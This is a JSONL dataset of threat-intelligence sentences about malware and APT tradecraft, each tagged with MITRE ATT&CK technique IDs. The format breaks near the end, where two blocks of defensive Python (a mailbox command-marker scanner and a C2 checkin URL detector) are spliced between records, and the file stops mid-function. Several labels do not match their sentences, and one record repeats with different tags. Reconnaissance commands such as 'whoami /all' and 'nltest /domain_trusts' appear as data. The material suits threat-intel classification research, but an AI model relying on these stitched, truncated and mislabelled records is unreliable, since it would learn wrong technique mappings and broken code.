{"text1":"The injection function is responsible for resolving all the required API calls. It then opens a handle to the target process by using the OpenProcess API. It uses the SizeOfImage field in the NT header of the DLL to be injected into allocated space into the target process along with a separate space for the init_dll function. The purpose of the init_dll function is to initialize the injected DLL and then pass the control flow to the entry point of the DLL. One thing to note here is a simple CreateRemoteThread method is used to start a thread inside the target process unlike the KernelCallbackTable technique used in our macro","labels":"['T1104']"}
{"text1":"SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. SDBbot is composed of three pieces: an installer, a loader, and a RAT component","labels":"['T1055.001', 'T1105']"}
{"text1":"This would save them the trouble of needing to load additional malware to exfiltrate files or other material. We are aware of no evidence of follow-up interactions between the operators and successful victims as part of any extortion attempts. Furthermore, Stealth Falcon\u2019s use of JavaScript to profile and de-anonymize victims seems inconsistent with a primary motivation of collecting information that could be used for blackmail","labels":"['T1005']"}
{"text1":"Siloscape mimics CExecSvc.exe privileges by impersonating its main thread and then calls NtSetInformationSymbolicLink on a newly created symbolic link to break out of the container","labels":"['T1134.001']"}
{"text1":"One unique and fairly recent variant is a plain downloader that follows a similar convention to the aforementioned MarkiRAT implants. It also leverages MFC and embeds its logic within a CDialog class, getting executed upon initiation of an MFC dialog object during runtime. The use of this sample diverges from those used by the group in the past, where the payload was dropped by the malware itself, suggesting that the group might be in the process of changing some of its TTPs","labels":"['T1071.001']"}
{"text1":"The implementation details of Seaduke also have some similarities to WellMess, as both use encrypted cookies to transfer metadata about the data being sent and use obfuscated base64 data in HTTP requests as the contents of communications. These techniques are not unique to Blue Kitsune but provide an interesting correlation between the WellMess backdoor and Blue Kitsune tools used since 2015","labels":"['T1071.001']"}
{"text1":"1) The group delivers a malicious Office lure document to victims, most likely via a spear-phishing email. 2) These lure documents use titles with government, military, and diplomatic themes, and the file names are written in English or Cyrillic languages. These documents are not very sophisticated, but evidence of infections shows that they\u2019re effective","labels":"['T1566.001']"}
{"text1":"In past attacks, the Ragnar Locker group has used exploits of managed service providers or attacks on Windows Remote Desktop Protocol (RDP) connections to gain a foothold on targeted networks","labels":"['T1569.002', 'T1543.003']"}
{"text1":"DOMAIN} nltest \/domain_trusts \/all_trusts net share route print netstat -nao net localgroup qwinsta WMI Query ROOT\\CIMV2:Win32_BIOS WMI Query ROOT\\CIMV2:Win32_DiskDrive WMI Query ROOT\\CIMV2:Win32_PhysicalMemory WMI Query ROOT\\CIMV2:Win32_Product WMI Query ROOT\\CIMV2:Win32_PnPEntity - whoami \/all - arp -a - ipconfig \/all - net view \/all - cmd \/c set - - nltest \/domain_trusts \/all_trusts - net share - route print - netstat -nao - net localgroup - qwinsta - WMI Query ROOT\\CIMV2:Win32_BIOS - WMI Query ROOT\\CIMV2:Win32_DiskDrive - WMI Query ROOT\\CIMV2:Win32_PhysicalMemory - WMI Query ROOT\\CIMV2:Win32_Product - WMI Query ROOT\\CIMV2:Win32_PnPEntity","labels":"['T1047']"}
{"text1":"Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. Unit 42 researchers have not observed any commands in the IRC channel. However, the IRC server's metadata indicates that the server was deployed on Jan","labels":"['T1071']"}
{"text1":"Grants system privileges via Windows services - Uses DLL sideloading technique to evade security solutions - Starts and injects code to a new svchost process to prevent tracking","labels":"['T1543.003', 'T1055']"}
{"text1":"This component overwrites the master boot record (MBR) of an infected host with a malicious 16-bit bootloader with a SHA256 hash of","labels":"['T1561.002']"}
{"text1":"Analysis of BRONZE BUTLER's operations, targeting, and capability led CTU researchers to assess that it is likely that the group is located in the PRC. The group has used spearphishing, strategic web compromises (SWCs), and an exploit of a zero-day vulnerability to compromise targeted systems. After exfiltrating targeted data from a network, BRONZE BUTLER typically deletes evidence of its activities. However, it maintains access to compromised environments when possible, periodically revisiting compromised sites to identify new opportunities for data exfiltration","labels":"['T1087.002']"}
{"text1":"Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB","labels":"['T1560.003', 'T1074.001']"}
{"text1":"The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen","labels":"['T1087.001', 'T1098', 'T1136.001', 'T1564.002']"}
{"text1":"At this point the C2 sends a JSON with commands to execute, including uploading\/downloading files, taking a screenshot and finding *.rar archives on the host","labels":"['T1041']"}
{"text1":"The captured sample used in this analysis is an MSI file named \u201cview-(AVISO)2020.msi\u201d that is spread through a ZIP archive, just as with the previous variant. In the previous analysis, I showed that this MSI file is parsed and executed automatically by MsiExec.exe when a user double clicks on it in Windows OS","labels":"['T1218.007']"}
{"text1":"After gaining an initial foothold on a compromised system, the NICKEL actors routinely performed reconnaissance on the network, working to gain access to additional accounts or higher-value systems. NICKEL typically deployed a keylogger to capture credentials from users on compromised systems","labels":"['T1070', 'T1114.002']"}
{"text1":"In 2011, while still at McAfee, he went on to reveal Comment Crew (which he calls Comment Panda) operating alongside Elderwood. It's called that because the group so often uses a technique involving internal software \"comment\" features on web pages as a tool to infiltrate target computers","labels":"['T1189']"}
{"text1":"The threat actor initially conducts system reconnaissance to assess the AV software installed and the user privilege","labels":"['T1518.001']"}
{"text1":"We observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command","labels":"['T1049', 'T1069.001']"}
{"text1":"Finally, it deletes Shadow Volume Copies and prevent the victim from using Shadow Volumes to recover their encrypted files","labels":"['T1047', 'T1490']"}
{"text1":"Deriving C2 URLs from a Domain Generation Algorithm (DGA) using lists of domain names, subdomains, top-level domains (TLDs), Uniform Resource Identifiers (URIs), file names, and file extensions","labels":"['T1568.002']"}
{"text1":"These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns","labels":"['T1105']"}
{"text1":"Although the developers attempt to use a denylist of files and directories to skip, it was observed encrypting core Windows operating system files, which caused the operating system to become unstable and crash. This was observed when running the ransomware on a Windows 2012 machine","labels":"['T1486']"}
{"text1":"In a new sample of the REvil ransomware discovered by\u00a0MalwareHunterTeam, a new -smode command-line argument was added that forces the computer to reboot into Safe Mode before encrypting a device","labels":"['T1562.009']"}
{"text1":"The BackConfig custom trojan has a flexible plug-in architecture for components offering various features, including the ability to gather system and keylog information and to upload and execute additional payloads","labels":"['T1105', 'T1082']"}
{"text1":"Since then, the threat actors have expanded delivery to include malicious spam campaigns, RDP attacks, and other attack vectors. In other reports, threat actors breached at least three managed service providers (MSPs) and used the access to deploy REvil to the MSPs' customers","labels":"['T1566']"}
{"text1":"The following diagram illustrates the changes applied to targeted executables after infection has taken place and how these components interact on execution","labels":"['T1091']"}
{"text1":"Basic system enumeration \u2013 The script collects the Windows OS version, computer name, and the contents of a file Ni.txt in $APPDATA path; the file is presumably created and filled by different modules that will be downloaded by the main module","labels":"['T1082']"}
{"text1":"Starting with a simple scan, the first information that the malware can collect is related to files with the following extensions: .docx, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .bmp, .tiff. For each file found on the disk, it retrieves the full path and the last modified date of the file. That information is encrypted using the AES key mentioned earlier and stored in the file 0.txt. Another scan targets the extensions .dat, .json, .db and like the previous scan it retrieves the full path and last modified date of the file. Then it encrypts them and it stores it under the file 57.txt","labels":"['T1119']"}
{"text1":"Reports system hardware and software configuration. This built-in utility is a command line version of the System Information.app (\/Applications\/Utilities\/System Information.app) and is a mainstay of all types of malware, spyware, post-exploitation tools, adware, and PUPs. Because of its deep insight into the entire environment, it can be used for a variety of purposes relating to environment discovery, detection evasion and anti-analysis","labels":"['T1082']"}
{"text1":"As seen in the above screenshot, there is a large overlap in unique strings in both samples. The original sample involved in the forbes.com breach used HTTP, which is consistent with the original variant discussed in this blog post. It should be noted that while the newest variant that uses direct network communication over port 22 no longer uses HTTP, references to the HTTP strings are still found within the sample itself. This is most likely due to code re-used by the attackers","labels":"['T1140']"}
{"text1":"In late July 2021, we identified an ongoing spear phishing campaign pushing Konni Rat to target Russia. Konni was first observed in the wild in 2014 and has been potentially linked to the North Korean APT group named APT37","labels":"['T1566.001']"}
{"text1":"The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP","labels":"['T1055.001']"}
{"text1":"The HTTP variant checks if Kaspersky is installed on the victim\u2019s machine by searching for the existence of files in the Kaspersky installation folder","labels":"['T1518.001']"}
{"text1":"The Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST request to the above URL. Like other Zebrocy samples, this Trojan collects system specific information it will send to the C2 server by running the command SYSTEMINFO & TASKLIST on the command line and by enumerating information about connected storage devices. This specific variant of Zebrocy will also send a screenshot of the victim host as a JPEG image to the C2 server","labels":"['T1113', 'T1057', 'T1120', 'T1082']"}
{"text1":"PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage","labels":"['T1218.005']"}
{"text1":"We observed a number of phishing emails that reference an invoice, as seen in Figure 1. The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that \u2013 when enabled \u2013 leads to the download of Hancitor","labels":"['T1566.001']"}
{"text1":"These are later used by the attackers to send targeted emails to the victims, with the obtained information being used to lure victims into opening those emails","labels":"['T1135']"}
{"text1":"The trojanized update file is a standard Windows Installer Patch file that includes compressed resources associated with the update, including the trojanized SolarWinds.Orion.Core.BusinessLayer.dll component","labels":"['T1036.005']"}
{"text1":"Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. ObliqueRAT has been linked to the Transparent Tribe APT group in the past","labels":"['T1566.001', 'T1566.002']"}
{"text1":"Xbash is a novel and complex Linux malware and the newest work of an active cybercrime group. From its characteristics and behaviors, we could realize many trends in current IoT\/Linux security battleground","labels":"['T1053.003']"}
{"text1":"Once we deobfuscated it, we found that the script contained a large array of hard coded domain names, with one of them being randomly selected and used for subsequent DNS queries. It is important to note that while the Powershell scripts for stages 3 and 4 contain two arrays of domains, the first array is only used if a failure condition is reached while the sample is using the second array. Figure 8: Stage 3 Domain List The 'logic' function present within this Powershell script randomly selects a C2 domain from the second array in the script and uses this domain to perform an initial lookup. If the result of the initial DNS TXT record request is empty or in the case the lookup fails, the 'do_lookup' function is then called and randomly selects a domain from the first array in the script. Interestingly, the domains used by the 'do_lookup' function did not appear to have active 'www' or 'mail' TXT records. The script also uses specific subdomains which are combined with the domains and used for the initial DNS TXT record queries performed by the malware. The malware uses the contents of the TXT record in the response to these queries to determine what action to take next. For instance, the first subdomain is 'www' and a query response with a TXT record containing 'www' will instruct the script to proceed. The response to this DNS request results in the transmission of the fourth stage malware, stored within the TXT record as displayed in Figures 10 and 11. Due to the size of the Stage 4 payload, DNS makes use of TCP for this transaction","labels":"['T1071.004']"}
{"text1":"It writes a file using two data structures: one associated with the file and other used for reading data from the C&C","labels":"['T1070']"}
{"text1":"The only way to ensure that deleted files, as well as files that you encrypt with EFS, are safe from recovery is to use a secure delete application. Secure delete applications overwrite a deleted file's on-disk data using techniques that are shown to make disk data unrecoverable, even using recovery technology that can read patterns in magnetic media that reveal weakly deleted files. SDelete (Secure Delete) is such an application. Note that SDelete securely deletes file data, but not file names located in free disk space","labels":"['T1070.004', 'T1485']"}
{"text1":"Download and execution of ntbscan (SHA-1: 90da10004c8f6fafdaa2cf18922670a745564f45) \u2013 NetBIOS scanner tool widely used by multiple APT actor including the prolific Chinese group APT10 - Execution of Windows built-in networking utility tools - Access to the victim\u2019s files, especially documents located on the Desktop","labels":"['T1083']"}
{"text1":"Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The group has at least four new trojanized setup files we observed: Firefox (a browser), VPNpro (a VPN client), DriverPack (a pack of drivers) and 5kPlayer (a media player). How did it work. Talos could not pinpoint the initial attack vector, however, the use of trojanized installation files to well-known applications is consistent with the previously documented campaigns. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. We can conclude that the PROMETHIUM threat actor is interested in new countries or the malicious framework developed by this threat actor is exported in more countries than previously thought. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The malicious service: rmaserv.exe . This binary has two main features. Conclusion . The PROMETHIUM threat actor is dedicated and resilient, exposing them hasn't refrained them from moving forward with their agenda","labels":"['T1036.005']"}
{"text1":"As part of Reflective DLL loading the malware performs the following tasks on the DLL it has unwrapped in memory: Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL) - Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL","labels":"['T1055.001']"}
{"text1":"4) Special attention was given to the design of the network communication, in order to reduce the noise a large number of encrypted machines may generate while contacting the Command and Control servers. 5) The encryption scheme is solid \u2013 using the AES and RSA algorithms","labels":"['T1573.002', 'T1486']"}
{"text1":"The tool was primarily used by the attackers to move laterally on the victim\u2019s network. PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance. WinSCP: Open source FTP client used to exfiltrate data from targeted organizations","labels":"['T1048.003']"}
{"text1":"While investigating the domains and infrastructure used by the phishing components of Gorgon Group, Unit 42 researchers witnessed several common operational security flaws with Gorgon Group's actors throughout their many campaigns. It was one of these OPSEC failures that gave us an interesting cross-section of malware Gorgon Group is using. Included in the directories were a combination of files leveraged in targeted attacks mentioned above against nation states. Additionally, there was a plethora of malware samples that were criminal in nature","labels":"['T1106']"}
{"text1":"Both variants of ServHelper use the same HTTP C&C protocol on port 443 (HTTPS) and, less frequently, port 80 (HTTP). An example of the initial phone home to the C&C server is shown in Figure 5","labels":"['T1071.001']"}
{"text1":"IcedID\u2019s operators probably plan on targeting businesses because they added a network propagation module to the malware from the get-go. IcedID possesses the ability to move to other endpoints, and X-Force researchers also observed it infecting terminal servers","labels":"['T1087.003']"}
{"text1":"Reaver proceeds to write a shortcut file to \u2018%TEMP%\\~WUpdate.lnk\u2019. This file is then copied to a filename of \u2018Windows Update.lnk\u2019, which is placed in the startup path previously identified. This shortcut file points to the path of the previously written \u2018Applet.cpl\u2019 file. Finally, Reaver.v1 will execute the \u2018~WUpdate.lnk\u2019 file in a new process, thus loading the recently dropped malicious CPL file. In the event this is successful, the malware will use the following path to store any dropped files","labels":"['T1218.002']"}
{"text1":"The attackers used the Windows Management Instrumentation Command Line Utility (wmic.exe) to execute commands on remote computers, such as adding a new user or executing additional downloaded PowerShell scripts. Cobalt Strike was also used to carry out credential dumping using ProcDump and to empty log files","labels":"['T1136', 'T1047', 'T1070.001', 'T1003.001']"}
{"text1":"3, 2019):\u00a0On May 16, 2019 FireEye's Advanced Practices team attributed the remaining \"suspected APT33 activity\" (referred to as GroupB in this blog post) to APT33, operating at the behest of the Iranian government. The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Custom Backdoor: POWERTON . POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet","labels":"['T1068']"}
|
|
{"text1":"The malware sets its persistence mechanism by creating a RunKey in the registry to ensure its survival after system reboot events","labels":"['T1547.001']"}
|
|
{"text1":"Audio surveillance: The malware uses the NAudio library to interact with the microphone and manage the audio stream. The library is stored server-side and pushed to the victim\u2019s machine using a special command. The bot will display the messages using a standard message box. The log includes the process name used by the victim, and keystrokes. The theft is performed by a specific component that enumerates credentials saved in various browsers. Process manager: The attacker can obtain a list of running processes and terminate these by using a specific button","labels":"['T1123']"}
|
|
{"text1":"HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware\u2019s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell","labels":"['T1059.003']"}
|
|
{"text1":"One of the custom tools used by the Leafminer group is a rebranded version of the widespread post-exploitation tool Mimikatz","labels":"['T1083']"}
|
|
{"text1":"The default case, when the service tag is empty, allows the malware to treat the contents of the response from the C2 as a command to execute via the Go os\/exec package (exec.Command followed by Cmd.Start). The format of the received command is checked against the below regex pattern for validity before executing, and the command is read from the body of the message received from the C2","labels":"['T1059.003']"}
|
|
{"text1":"In 2014, Imminent Monitor started supporting third-party plugins. The first of these offered the ability to turn the webcam light off while monitoring. Shockwave\u2122 wrote: \u201cHey, good job on being the first to release a plugin for Imminent Monitor","labels":"['T1125']"}
|
|
{"text1":"Where the number of passed parameters is one, the payload will read the sys.bin.url file from %appdata%\\systemconfig. It then spawns a new svchost process as C:\\\\windows\\\\system32\\\\svchost.exe -k update in a suspended state and injects the payload. Finally, it patches the entry point of svchost.exe so it can execute the malicious payload after the ResumeThread call","labels":"['T1055.012']"}
|
|
{"text1":"This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. This malware module works independently of the others and maintains its own Bulgarian e-mail account. The account is hardcoded in the module along with the master\u2019s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on the infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits","labels":"['T1005']"}
|
|
{"text1":"In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore. It also does not use FTP for exfiltration","labels":"['T1041', 'T1140']"}
|
|
{"text1":"TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. TEARDROP does not have code overlap with any previously seen malware. We believe that this was used to execute a customized Cobalt Strike BEACON","labels":"['T1105']"}
|
|
{"text1":"The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. They continue lateral movement and discovery in an attempt to identify the data of interest","labels":"['T1021.006']"}
|
|
{"text1":"It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. CTU\u2122 researchers attribute GandCrab to the GOLD GARDEN threat group","labels":"['T1190', 'T1133']"}
|
|
{"text1":"CWS or WSA web scanning prevents access to malicious websites, including watering hole attacks, and detects malware used in these attacks","labels":"['T1189']"}
|
|
{"text1":"The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation","labels":"['T1059.001', 'T1027']"}
|
|
{"text1":"BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure. The threat actors also integrate infrastructure they likely previously compromised for espionage purposes. For example, CTU researchers identified the group using IP addresses owned by several, presumably compromised, research organizations to interact with web shells in other target environments","labels":"['T1003.002', 'T1003.004']"}
|
|
{"text1":"As mentioned previously, this backdoor also supports loading plugins. The server creates a thread that searches for files matching the following pattern lPH*.dll. If such a file exists, it is loaded and its export function ModuleStart is called. Among the various plugins we have located so far, one is able to steal recent files and files from USB thumb drives","labels":"['T1025', 'T1083']"}
|
|
{"text1":"Phishing emails continued to use links to external ZIP or RAR archives, which ultimately contained an executable with the extension SCR. The attackers also made extensive use of Hostinger\u2019s cheap web hosting services to deliver initial payloads","labels":"['T1204.001']"}
|
|
{"text1":"After decrypting the C&C server address, the shellcode proceeds to send an HTTP GET request to fetch the resource: \u201cmsdn.cpp\u201d on the\u00a0server","labels":"['T1071.001']"}
|
|
{"text1":"The purpose of the bytecode is to decrypt the embedded payload, load it into memory reflectively and execute it","labels":"['T1140']"}
|
|
{"text1":"The backdoor contains only narrow capabilities: download and upload files, run commands and send the attackers the results. However short the list, they allow the attackers to upload and execute additional tools for further reconnaissance and lateral movement","labels":"['T1105']"}
|
|
{"text1":"Network analysis \u2014 run one of the plugins to retrieve Active Directory and network information (Fig","labels":"['T1016']"}
|
|
{"text1":"Before running the above command to open the decoy document, the shellcode enumerates the running processes on the system, specifically looking for processes created for an executable with a filename that starts with \u201cavp.\u201d, presumably in an attempt to find Kaspersky\u2019s antivirus process. If the process is found, the shellcode will not open the decoy document and exits","labels":"['T1057']"}
|
|
{"text1":"This RAT is also known for its keylogging and file transfer functionality. As such, any remote attacker can load any files onto the infected machine or even steal documents","labels":"['T1036.005', 'T1105']"}
|
|
{"text1":"The malware will setup the miner and then the miner will persist it in the system in two ways: 1) by adding itself as a service\u00a0if the malware gains admin privileges or 2) by adding the batch file to the startup folder","labels":"['T1543.003']"}
|
|
{"text1":"Registered and active during late June 2020, newspointview[.]com has been used with more recent SombRAT variants as the primary C2 domain","labels":"['T1105']"}
|
|
{"text1":"An example of these tasks is shown below: \u2022 write a file and execute it with CreateProcess() capturing all of the standard output \u2022 update C&C configuration, plugin storage, etc \u2022 update autoruns \u2022 write arbitrary files to the filesystem (\u201cFile Upload\u201d) \u2022 read arbitrary files from the filesystem (\u201cFile Download\u201d) \u2022 update itself \u2022 uninstall \u2022 push task results to C2 servers","labels":"['T1105']"}
|
|
{"text1":"Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. Whitelists files, folders and extensions from encryption. Encrypts files on local and network storage. Customizes the name and body of the ransom note, and the contents of the background image. Exfiltrates encrypted information on the infected host to remote controllers. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers","labels":"['T1486']"}
|
|
{"text1":"In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. It also does not use FTP for exfiltration","labels":"['T1059.001']"}
|
|
{"text1":"Once you have set up the database and logged into the BloodHound web application, you need to pull AD data from your environment using the BloodHound PowerShell ingestor. Figure 1 shows a sample command that searches all domains in the forest (-SearchForest) and the folder location used to save the resulting CSV files","labels":"['T1059.001']"}
|
|
{"text1":"If the DoublePulsar backdoor does not exist, then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit. After the first thread determines the local network subnet, the SMB worm scans local addresses beginning at the start of the netblock and increasing by one to the end of the netblock","labels":"['T1016']"}
|
|
{"text1":"This Unix binary is widely used by many malware families to determine the device\u2019s unique ID (for campaign tracking), usually in the form of the machine\u2019s serial number. This may or may not be hashed with another utility (e.g. md5) before being sent to the C2. To facilitate anti-analysis and evasion, ioreg is also used by some threat actors to determine whether the device is running in a virtual environment","labels":"['T1497.001']"}
|
|
{"text1":"It uses GetCurrentProcessId to find the process ID of the current process. It compares the UniqueProcessId member of the SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX structure with the current process ID","labels":"['T1057']"}
|
|
{"text1":"Encryption is definitely the simplest method to hide the C&C server. We have encountered cases where the port has been stored in the data section, in the Delphi form data, or randomly chosen from a range","labels":"['T1102.001']"}
|
|
{"text1":"The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script","labels":"['T1204.002']"}
|
|
{"text1":"1) The malicious macro scans the victim\u2019s Outlook inbox and looks for the strings \u201c$$cpte\u201d and \u201c$$ecpte\u201d. 2) Then the macro will open a CMD shell that will execute whatever instruction \/ command is in between the strings. 4) The macro searches for the special strings in the \u201cDeleted Items\u201d folder to find the attacker\u2019s email address and sends the data back to the attackers via email. 5) Lastly, the macro will delete any evidence of the emails received or sent by the attackers","labels":"['T1566.001']"}
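The marker-delimited command channel in this record can be searched for from the defender's side. The following is an added example, not code from the report the record was drawn from: a Python scanner over a constructed mailbox export that extracts whatever sits between $$cpte and $$ecpte and lists the senders of marked messages in Deleted Items, which is where the macro looks up its reply address. The folder layout, sender addresses and message bodies are invented sample data.

```python
import re

# Constructed mailbox export, not real mail: items as an analyst might dump
# them from a PST. Folder names, senders and bodies are invented.
SAMPLE_ITEMS = [
    {"folder": "Inbox", "from": "payroll@example.test",
     "body": "Hi, the quarterly figures are attached.\n"},
    {"folder": "Inbox", "from": "notify@example.test",
     "body": "Reminder\n$$cpte whoami /all $$ecpte\nRegards\n"},
    {"folder": "Deleted Items", "from": "relay@example.test",
     "body": "$$cpte ipconfig /all $$ecpte"},
    {"folder": "Sent Items", "from": "victim@example.test",
     "body": "$$ecpte nothing here $$cpte"},  # markers reversed: not a command
]

# The markers are literal, so '$' is escaped. DOTALL lets a command span
# line breaks; the lazy quantifier stops at the first end marker.
MARKER_RE = re.compile(r"\$\$cpte(?P<cmd>.*?)\$\$ecpte", re.DOTALL)


def extract_marked_commands(items):
    """Return every command found between the start and end markers,
    with the folder it was found in and the sender of the message."""
    hits = []
    for item in items:
        for m in MARKER_RE.finditer(item["body"]):
            hits.append({
                "folder": item["folder"],
                "from": item["from"],
                "command": m.group("cmd").strip(),
            })
    return hits


def attacker_addresses(items):
    """Senders of marked messages in Deleted Items: the macro searches that
    folder for the markers to learn the address it reports back to."""
    return {
        h["from"]
        for h in extract_marked_commands(items)
        if h["folder"] == "Deleted Items"
    }


if __name__ == "__main__":
    for h in extract_marked_commands(SAMPLE_ITEMS):
        print(f"{h['folder']:<14} {h['from']:<22} {h['command']}")
    print("reply-to candidates:", sorted(attacker_addresses(SAMPLE_ITEMS)))
```

Run it over a real export by replacing SAMPLE_ITEMS with the items from your PST parser; the markers are literal strings, so the scan also works on raw MSG or EML bodies.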
|
|
{"text1":"A recent lull in the distribution of spam spreading information-stealing malware via\u00a0the Hancitor downloader has been snapped","labels":"['T1566.002']"}
|
|
{"text1":"There are three types of URLs present in the decrypted configuration. The first type of URL listed in the configuration data is used for the plain HTTP (that is, non-Tor) communication with C&C servers. The bot reports to the C&C server using the typical request pattern: for example, the initial checkin to the C&C server is in the form of: cfg_url + \u201c\/images\/\u201d + encoded_data + (.jpeg||.gif||.bmp)","labels":"['T1132']"}
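The checkin shape in this record (cfg_url + "/images/" + encoded_data + an image extension) is a usable network indicator. As an added example that is not part of the original report, the Python below matches that shape over constructed proxy-log URLs, tries to base64-decode the blob (the record does not say how encoded_data is encoded, so base64 is an assumption for the demo) and reports the blob's entropy as supporting evidence. All URLs and hostnames are invented.

```python
import base64
import binascii
import math
import re
from urllib.parse import urlsplit

# Constructed proxy-log URLs, not real traffic. The first three follow the
# checkin shape with a base64 blob (assumed encoding); the rest are ordinary
# image fetches that must not be flagged.
SAMPLE_URLS = [
    "http://cdn.example.test/images/aGVsbG8gd29ybGQgdGhpcyBpcyBhIGJvdA==.jpeg",
    "http://cdn.example.test/images/QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo.gif",
    "http://cdn.example.test/images/x9q3L2ZwK7mP0sT1vR8nB4jH6cD5fG2a.bmp",
    "http://www.example.test/images/logo.png",
    "http://www.example.test/images/header.jpeg",
    "http://www.example.test/images/banner_2019.gif",
    "http://www.example.test/static/js/app.js",
]

# cfg_url + "/images/" + encoded_data + (.jpeg|.gif|.bmp): an /images/ path
# whose "file name" is a long run of base64-alphabet characters.
CHECKIN_RE = re.compile(
    r"^/images/(?P<blob>[A-Za-z0-9+/=_-]{16,})\.(?:jpeg|gif|bmp)$"
)


def shannon_entropy(s):
    """Bits per character; encoded or encrypted blobs score higher than names."""
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def try_base64(blob):
    """Decode standard or URL-safe base64, tolerating stripped padding.
    Returns bytes, or None if the blob is not valid base64 at all."""
    padded = blob + "=" * (-len(blob) % 4)
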